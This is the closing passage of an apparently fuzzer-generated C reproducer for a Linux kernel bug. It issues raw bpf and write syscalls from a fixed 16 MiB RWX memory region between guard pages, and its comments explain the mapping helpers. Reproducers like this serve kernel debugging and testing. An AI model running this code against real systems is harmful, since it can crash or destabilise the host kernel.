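    *(uint32_t*)0x20001188 = 0x1f;
    *(uint32_t*)0x2000118c = 0x20;
    *(uint32_t*)0x20001190 = r[6];
    *(uint32_t*)0x20001194 = -1;
    *(uint64_t*)0x20001198 = 0;
    syscall(__NR_bpf, /*cmd=*/8ul, /*arg=*/0x20001180ul, /*size=*/0x20ul);
    break;
  case 18:
    *(uint32_t*)0x20000040 = 0;
    *(uint32_t*)0x20000044 = r[1];
    *(uint32_t*)0x20000048 = 0x26;
    *(uint32_t*)0x2000004c = 0x2020;
    *(uint32_t*)0x20000050 = 0;
    *(uint32_t*)0x20000054 = r[3];
    *(uint64_t*)0x20000058 = 0;
    syscall(__NR_bpf, /*cmd=*/9ul, /*arg=*/0x20000040ul, /*size=*/0x20ul);
    break;
  case 19:
    sprintf((char*)0x200001c0, "0x%016llx", (long long)0xa30d);
    syscall(__NR_write, /*fd=*/-1, /*buf=*/0x200001c0ul, /*len=*/0xfffffdeful);
    break;
  }
}

/* Map one fixed-address anonymous region, or abort the reproducer.
 *
 * Every store in execute_call() dereferences a hard-coded 0x2000xxxx
 * address inside the region mapped here. If a MAP_FIXED mapping is refused
 * (e.g. an address-space limit) and execution continues, those stores
 * become wild writes/segfaults that have nothing to do with the kernel bug
 * being reproduced, so fail fast instead. Raw syscall() reports failure as
 * -1 with errno set. Uses exit(1) like the other helpers in this file.
 *
 * addr, len, prot: passed straight through to the raw mmap syscall.
 * flags 0x32 == MAP_PRIVATE | MAP_FIXED | MAP_ANONYMOUS (x86-64 values;
 * the __NR_bpf fallback of 321 above pins this file to x86-64).
 */
static void map_fixed_or_die(unsigned long addr, unsigned long len,
                             unsigned long prot)
{
  if (syscall(__NR_mmap, addr, len, prot, /*flags=*/0x32ul, /*fd=*/-1,
              /*offset=*/0ul) == -1)
    exit(1);
}

/* Entry point: set up the fixed scratch memory the reproducer relies on,
 * then hand over to loop() (defined elsewhere in this file). */
int main(void)
{
  /* PROT_NONE page directly below the data region (0x1ffff000-0x1fffffff);
   * presumably a guard page so underruns fault instead of corrupting memory. */
  map_fixed_or_die(0x1ffff000ul, 0x1000ul, /*prot=*/0ul);
  /* 16 MiB RWX region (prot 7 == PROT_READ|PROT_WRITE|PROT_EXEC) holding
   * every buffer execute_call() writes through raw pointers. */
  map_fixed_or_die(0x20000000ul, 0x1000000ul, /*prot=*/7ul);
  /* PROT_NONE page directly above the data region (0x21000000-0x21000fff). */
  map_fixed_or_die(0x21000000ul, 0x1000ul, /*prot=*/0ul);
  loop();
  return 0;
}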